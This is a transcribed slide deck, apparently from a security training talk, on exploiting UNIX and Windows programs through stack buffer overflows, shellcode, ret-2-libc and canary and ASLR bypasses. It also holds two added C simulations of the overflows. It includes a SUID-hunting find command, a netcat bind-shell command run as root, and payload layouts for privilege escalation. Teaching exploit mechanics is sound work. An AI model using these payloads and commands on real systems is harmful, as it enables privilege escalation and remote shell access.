This document discusses various techniques for exploiting UNIX executable programs, including buffer overflow vulnerabilities. It begins with an introduction and outlines an agenda covering vulnerable UNIX applications, memory layout and stacks, buffer overflows, shellcode, and various protection mechanisms and bypass techniques. These include basic stack overflows, bypassing password protections, limited stack spaces, Ret-2-libc exploits, and return-oriented programming (ROP) chains to execute multiple commands. Demo exploits are proposed to show gaining root privilege on vulnerable applications.
3. “There are some relationships between
- Reverse Engineering
- Buffer overflow
- Shellcode
They are the complement of each other”
“Sleepy Kama”
#Inspiration
8. VULNERABLE UNIX APPLICATION
Has "root" permission as its user or group owner
SUID or SGID bit is set (an 's' in place of the eXecute bit)
These two criteria together allow privilege escalation to root
list="$(find / \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null)"; for i in $list; do ls -al "$i"; done
ls -lR / 2>/dev/null | grep "wsr" | grep "root"
10. VULNERABLE UNIX APPLICATION
Uses unsafe standard input/string functions
Ex: strcpy(), gets(), sprintf(), vsprintf()
They can make the program segfault or overflow a buffer
21. BUFFER OVERFLOW
The situation in which the data input to the program is larger than the size of the buffer declared to hold it
Ex: char pw[608];
AAAAAAAAAA....[607 of A]….AAA\x00 | SFP | RP
AAAAAAAAAA….[616 of A]….AAAAAAAAAAAAAA\x00
SFP = 0x41414141
***RP = 0x41414141
“Segmentation fault”
“Illegal Instruction”
22. “How can we detect
buffer overflow in unix application?”
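A model of the slide-21 frame, added here as an example and not part of the deck: a `char pw[608]` buffer followed by the SFP and RP slots, a strcpy-style copy into it that reproduces the 0x41414141 values, and the bounded copy that rejects the oversized input instead. The struct standing in for a real stack frame and the original SFP/RP values are constructed assumptions.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Frame model for slide 21 on 32-bit x86: the 608-byte password buffer
 * sits directly below the saved frame pointer (SFP) and the return
 * pointer (RP). It is an ordinary struct, not a real stack frame, so the
 * simulated overflow stays inside it and cannot affect this program. */
#define PW_SIZE 608

struct frame_model {
    char     pw[PW_SIZE];
    uint32_t sfp;   /* saved EBP of the caller */
    uint32_t rp;    /* saved EIP: where the function returns to */
};

#define SFP_CLOBBERED 1
#define RP_CLOBBERED  2

struct sim_result {
    int      effect;   /* bitmask of SFP_CLOBBERED / RP_CLOBBERED */
    uint32_t sfp;      /* value of the saved slots after the copy */
    uint32_t rp;
};

/* Emulates strcpy(f->pw, input): every input byte plus the terminating
 * NUL is written from the start of pw with no regard for PW_SIZE.
 * The real strcpy keeps going past the frame; the model stops at its edge. */
static void copy_unbounded(struct frame_model *f, const char *input)
{
    size_t n = strlen(input) + 1;
    if (n > sizeof *f)
        n = sizeof *f;
    memcpy((unsigned char *)f, input, n);
}

/* The fix: refuse input that does not fit together with its NUL, instead of
 * writing past the buffer. Returns 0 on success, -1 on rejection. */
int copy_bounded(char *dst, size_t dstsz, const char *input)
{
    size_t n = strlen(input);
    if (dstsz == 0 || n >= dstsz)
        return -1;
    memcpy(dst, input, n + 1);
    return 0;
}

/* Constructed test input: n bytes of 'A' (0x41) followed by a NUL,
 * exactly the pattern the slide feeds the program. */
static void fill_as(char *out, size_t n)
{
    memset(out, 'A', n);
    out[n] = '\0';
}

/* Runs the slide's experiment with n_as bytes of 'A' through the unbounded
 * copy and reports which saved slot was reached and what it now holds. */
struct sim_result simulate_overflow(size_t n_as)
{
    const uint32_t orig_sfp = 0xbffffa98u;  /* constructed placeholder */
    const uint32_t orig_rp  = 0x080484c2u;  /* constructed placeholder */
    struct frame_model f;
    char input[sizeof f + 1];
    struct sim_result r = { 0, 0, 0 };

    if (n_as > sizeof f)
        n_as = sizeof f;
    fill_as(input, n_as);

    memset(f.pw, 0, sizeof f.pw);
    f.sfp = orig_sfp;
    f.rp  = orig_rp;
    copy_unbounded(&f, input);

    if (f.sfp != orig_sfp) r.effect |= SFP_CLOBBERED;
    if (f.rp  != orig_rp)  r.effect |= RP_CLOBBERED;
    r.sfp = f.sfp;
    r.rp  = f.rp;
    return r;
}

/* The same input against the bounded copy: 1 if it was rejected, 0 if it fit. */
int bounded_copy_rejects(size_t n_as)
{
    char input[sizeof(struct frame_model) + 1];
    char pw[PW_SIZE];

    if (n_as > sizeof(struct frame_model))
        n_as = sizeof(struct frame_model);
    fill_as(input, n_as);
    return copy_bounded(pw, sizeof pw, input) == -1;
}
```

Even 610 bytes, short of the 616 on the slide, already alter the SFP slot, because the copy's own NUL terminator lands there.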
35. “Imagine if we can control Return Pointer to
our own Instruction”
“So, we can control the whole system”
36. SHELL CODE
[Malicious Machine OpCode] + AAAAAAAAAAAAAAA | SFP | RP
SFP = 0x41414141
***RP = 0xFBFF0544 (the address where the opcode was placed)
The attacker can point the return pointer at malicious machine opcode placed in memory (shellcode).
Inserting the shellcode as part of the input reduces the complexity of exploitation.
37. SHELL CODE
Shellcode is the code the attacker wants the system to run in order to carry out the commands the attacker needs (created from assembly and converted to opcode)
Ex:
Open a port for connection to that system with root privilege
Add a user to the system
Run a shell with root privilege
Shellcode is written in hexadecimal format
38. “What happens if we can make the Return Pointer
system_call /bin/sh
in a program running as root?”
43. Where can we get shellcode to use in an exploit?
Create your own shellcode (takes quite some time)
Use Metasploit to generate shellcode
Meterpreter
Search the internet:
shell-storm.org/shellcode
packetstormsecurity.com
www.exploit-db.com/exploits
SHELL CODE
73. LIMITED STACK SPACE
[NOP space (NOP sled)] + [Shellcode]
AAAAAAAAAAAAA…[612 of A]…AAAAAAAA | SFP | RP
SFP = 0x41414141
***RP = 0xBFFFxxxx ??? (we don’t know yet)
If the size of the buffer is limited, we need to put the shellcode somewhere else in the stack and control RP to run it
77. Demo #3
Exploit to get root privilege with limited stack space
78. SUMMARY
Grant() main() AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | RP
\x90\x90\x90\x90\x90 + [Shell Code] + AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | RP
\x90\x90\x90\x90\x90\x90\x90 + [Shell Code] AAAAAAAAAAAAAAAAAAAAAAAAAAA | RP | AAAAA
Bypass password protection
Buffer overflow to run shellcode to get root privilege
Buffer overflow to run shellcode with limited stack space
83. Characteristics of a vulnerable program
SUID or SGID bit set
Can be overflowed
Uses libc
BYPASS LIMITED STACK SPACE BY RET-2-LIBC
84. “What happens if we point RP here and run?”
system_call nc -l -p 9999 -e /bin/sh
85. Fool the program into making a system call with an evil command
System_call nc -l -p 9999 -e /bin/sh
AAAAAAAAAAAAA | SFP | RP = system | Arg
If Arg = “nc -l -p 9999 -e /bin/sh” and the program runs as “root”,
then “nc -l -p 9999 -e /bin/sh” runs as “root”
86. Find the location of the “system” library function
87. Create the “evil” argument as a system global variable
AAAAAAAAAAAAA | SFP | RP = \xf0\x4e\xec\xb7 (system) | Arg = \x98\xfa\xff\xbf (NC)
115. STACK GUARD (CANARY)
Protection mechanism placed in the stack (8 bytes) to detect the overflow and prevent control of RP
Needs to be included when we compile the program:
gcc -fstack-protector code.c -o myprogram
If the canary is overwritten, the program is terminated
Types of canary:
NULL canary (0x00000000)
Terminator canary (0x00000aff – 0x000aff0d)
Random canary (unpredictable 4 bytes)
AAAAAAAAAAAAAAAAAAAA | AAAA (Canary) | AAAA (SFP) | AAAA (RP)
116. NULL canary and terminator canary can be defeated by “canary repair”
NULL canary: only if the app uses the gets() function
AAA…AAA00000000AAAA[RP]\x90\x90\x90…[Shellcode]\x0a
Terminator canary (always 0x00000aff):
app uses the gets() function
app uses the strcpy() function and needs more than 1 arg
Arg1 = AAA…AAAAAAA0affAAAA[RP]\x90\x90\x90…[Shellcode]\x00
Arg2 = BBB…BBBBB\x00
Arg3 = CCC…CCC\x00
AAA…AAA00000affAAAA[RP]\x90\x90\x90…[Shellcode]
STACK GUARD (CANARY) DEFEAT
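The canary check from slides 115-116 as a model, added here as an example and not part of the deck: a frame with buffer, canary, SFP and RP, the stop-byte behaviour of strcpy() and gets(), and the epilogue check, run against the NULL, terminator and random canary so the outcome of each case can be compared. The 32-byte buffer, the saved values and the random canary value are constructed assumptions.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Frame model for slides 115-116 (32-bit layout as drawn there): buffer,
 * then the canary, then saved EBP (SFP) and the return pointer (RP). It is
 * an ordinary struct, so the simulated overflow never leaves it. */
#define BUF_SIZE 32                      /* constructed size for the model */

struct guarded_frame {
    char     buf[BUF_SIZE];
    uint32_t canary;
    uint32_t sfp;
    uint32_t rp;
};

#define NULL_CANARY       0x00000000u
#define TERMINATOR_CANARY 0x000aff0du    /* NUL, LF, 0xff, CR: a value the deck lists */

/* Outcome of one simulated overflow against the epilogue check. */
enum outcome { NOT_REACHED = 0, DETECTED = 1, MISSED = 2 };

/* Copies in[] into the frame from buf[0] the way the two library routines
 * do: strcpy() stops at the first 0x00 byte, gets() stops at 0x0a, and both
 * then write a terminating NUL. The model also stops at its own edge. */
static void overflow_frame(struct guarded_frame *f, const unsigned char *in,
                           size_t in_len, int use_gets)
{
    unsigned char *p = (unsigned char *)f;
    unsigned char stop = use_gets ? 0x0a : 0x00;
    size_t cap = sizeof *f, i;

    for (i = 0; i < in_len && i < cap; i++) {
        if (in[i] == stop)
            break;
        p[i] = in[i];
    }
    if (i < cap)
        p[i] = '\0';
}

/* One experiment: the frame holds frame_canary; the constructed input fills
 * buf, writes input_canary where the canary sits (the "canary repair" of
 * slide 116), then 'B's over SFP and 'C's over RP, then the routine's own
 * terminator. Returns DETECTED when the epilogue check fires, MISSED when
 * the canary survives but RP was overwritten, NOT_REACHED when the copy
 * stopped before touching RP. */
enum outcome probe(uint32_t frame_canary, uint32_t input_canary, int use_gets)
{
    const uint32_t orig_rp = 0x080484c2u;   /* constructed placeholder */
    struct guarded_frame f;
    unsigned char in[BUF_SIZE + 4 + 4 + 4 + 1];

    memset(f.buf, 0, sizeof f.buf);
    f.canary = frame_canary;
    f.sfp = 0xbffffa98u;                    /* constructed placeholder */
    f.rp = orig_rp;

    memset(in, 'A', BUF_SIZE);
    memcpy(in + BUF_SIZE, &input_canary, 4);   /* host byte order, as in the struct */
    memset(in + BUF_SIZE + 4, 'B', 4);
    memset(in + BUF_SIZE + 8, 'C', 4);
    in[BUF_SIZE + 12] = use_gets ? 0x0a : 0x00;

    overflow_frame(&f, in, sizeof in, use_gets);

    if (f.canary != frame_canary)
        return DETECTED;                    /* the compiled check would abort here */
    return f.rp != orig_rp ? MISSED : NOT_REACHED;
}
```

The NULL canary holds against strcpy() only because the copy stops at its first zero byte; a gets()-style copy passes zero bytes through, which is the case the slide singles out, while the terminator canary's 0x0a byte stops gets() short of the saved slots.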
122. ADDRESS SPACE LAYOUT RANDOMIZATION (ASLR)
Technique used to prevent an attacker from jumping to a particular piece of exploit code in memory by randomizing the virtual addresses at every run
123. ADDRESS SPACE LAYOUT RANDOMIZATION (ASLR)
\x90\x90\x90\x90\x90 + [Shell Code] + AAAAAAAAAAAAAAAAAAAAA | RP…….
Randomness is 2^20, so the probability = 1/2^20, or about 0.000001
How can we increase the probability of jumping to the shellcode?
124. ADDRESS SPACE LAYOUT RANDOMIZATION (ASLR) DEFEAT METHOD
AAAAAAAAAAAAAAAAAAAAAAA | RP → JMP ESP → esp → \x90\x90\x90…[ shell code ]…….
If the OS kernel has some static lib (kernel < 2.6.20),
use a JMP ESP (trampoline) instruction in that static lib to bring RP to the shellcode
INC EAX ADD EBS, EBP ….
125. ADDRESS SPACE LAYOUT RANDOMIZATION (ASLR) DEFEAT METHOD
If the OS kernel has no static lib (kernel >= 2.6.20), we need to write an application that calls the vulnerable application to limit the random address space (app wrap-up)
AAAAAAAAAAAAAAAAAAAAAAAAA | RP → \x90\x90\x90…\x90 (NOP sled) + [ shell code ]
Check the current ESP value and set
RP = ESP + [vul app buffer]
126. Wrap-up app
ADDRESS SPACE LAYOUT RANDOMIZATION (ASLR) DEFEAT METHOD
129. DIFFERENCE BETWEEN UNIX AND WINDOWS APPLICATION EXPLOITS
Unix applications communicate directly with the kernel: App → Kernel
Windows applications must communicate through the Windows API (no direct communication with the kernel): App → API → Kernel. This makes them more difficult to exploit
130. WINDOWS SHELLCODE
Static shellcode (example for Windows XP)
Static or fixed memory addresses of the Windows API functions used in the exploit code (specific OS version and SP)
Find address of WinExec() > used to execute cmd / app
Find address of ExitProcess() > used to clear registers
Portable shellcode
Dynamically find the memory addresses of the needed Windows API functions using 2 useful Windows APIs:
LoadLibraryA() to get the HMODULE (DLL's base address)
GetProcAddress() to get the real address of a function
Get address of WinExec()
Get address of ExitProcess()
131. Normally, viruses use LoadLibraryA() and GetProcAddress() to make portable exploits
135. Finding the vulnerability in the application
BASIC STACK BUFFER OVERFLOW ON WINDOWS APPLICATION
136. The input to the program is larger than the size of the buffer declared to hold it
char local[49];
AAAABBBBCCCC.....KKKKLLLLMMMM | SFP | RP
AAAABBBBCCCC.....KKKKLLLLMMMM NNNN OOOOPPPP ← ESP
137. Find an address to jump to the exploit code
\x90\x90\x90\x90…[shellcode]…AAAAAAAA | RP
* RP = “\x40\xff\x13
138. Exploit successful
Successfully exploited, but calc.exe runs with your permissions, not “Administrator”
139. Imagine if some Windows application provides a network service like FTP that is started by the “SYSTEM” account and has a buffer overflow vulnerability (Ex: WarFTP app)
142. BASIC STACK BUFFER OVERFLOW ON WINDOWS APPLICATION
FTP 192.168.1.2
USER AAAAAA….AAAA | $JMP_ESP (RP) | \x90\x90\x90\x90 (ESP) | SYSCODE
143. After connecting back to the open port, log in with user/password to confirm that we have successfully obtained system privilege
144. Rule of permission gaining in Windows exploits
If we exploit the application, we get the permissions of whoever started or ran the application
If the application or service is started or run by the “Administrator” or “SYSTEM” account, we gain “Administrator” or “SYSTEM” privilege
All Windows vulnerabilities that attackers use to compromise the OS come from successfully exploiting a “SYSTEM” service
BASIC WINDOWS EXPLOITATION
145. DLL injection exploitation
SafeSEH (Structured Exception Handling) and its abuse
Windows ASLR and how to defeat it
Windows DEP and how to defeat it
GS protection in Windows applications and how to defeat it
Advanced pivoting attack techniques
Heap overflow / heap spray / use-after-free
“Unfortunately, we do not have enough time to walk through these”
MORE INTERESTING TOPICS FOR WINDOWS
146. CoreLAN team: https://www.corelan.be
NetSEC: http://netsec.ws/?p=180
http://www.cis.syr.edu/~wedu/education/buffer_overflow.html
LEARNING SITES
147. REFERENCE
SANS 660: Advanced Penetration Testing, Exploit Writing, and Ethical Hacking
GIAC GXPN: Exploit Researcher and Advanced Penetration Tester
Day, David J. and Zhao, Zheng-Xu. Protecting Against Address Space Layout Randomization (ASLR) Compromises and Return-to-Libc Attacks Using Network Intrusion Detection Systems. November 2011, Volume 8, Issue 4, pp. 472-483
Cowan, C. Buffer Overflow Attacks. StackGuard: Automatic Adaptive Detection and Prevention of Buffer-Overflow Attacks. 1 October 2008
Durden, T. Defeating PaX ASLR protection. Phrack, 2002, Vol. 12, Issue 59